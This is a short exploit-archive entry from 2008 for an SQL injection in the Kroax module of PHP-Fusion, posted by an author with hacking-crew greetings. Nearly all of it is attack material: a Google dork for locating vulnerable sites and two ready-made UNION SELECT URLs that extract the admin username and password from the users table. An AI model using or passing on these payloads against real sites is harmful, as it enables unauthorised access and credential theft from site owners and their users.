PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability
# Published : 2008-06-26
# Author : boom3rang
# Previous Title : PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : Galmeta Post CMS 0.2 Multiple Local File Inclusion Vulnerabilities

==========================================================
The kroax php_fusion Remote SQL-injection.
==========================================================

##################################
Author     :  boom3rang
Contact   :  boomerang@knaqu-shqipe.de
webpage  :  www.khg-crew.ws 
##################################


--- Remote SQL Injection ---

[+]Google Dork:                               inurl:"kroax.php?category" 

--------------
 Exploit
--------------

example:

www.site.com/infusions/the_kroax/kroax.php?category= [SQL]



[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang


[+] password: 
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang


ps. To find username use first  "SQL" with table_name  user_name, and for password use second "SQL" with table_name user_password.




==========================================================    Greetz to:  All my Albanian brothers   ==========================================================

# www.Syue.com [2008-06-26]